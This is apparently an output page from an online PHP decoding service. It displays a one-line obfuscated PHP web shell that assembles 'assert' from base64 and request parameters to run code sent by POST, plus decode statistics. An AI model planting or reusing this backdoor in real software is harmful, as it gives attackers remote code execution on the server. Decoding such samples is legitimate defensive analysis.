Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$c=base64_decode('YXNzZXI=').$_GET[n].'t';@$c($_POST[x]);..
Decoded Output download
<? $c=base64_decode('YXNzZXI=').$_GET[n].'t';@$c($_POST[x]); ?>
Did this file decode correctly?
Original Code
$c=base64_decode('YXNzZXI=').$_GET[n].'t';@$c($_POST[x]);
Function Calls
| base64_decode | 1 |
Stats
| MD5 | 7264de2f8328def179384b150f466c97 |
| Eval Count | 0 |
| Decode Time | 103 ms |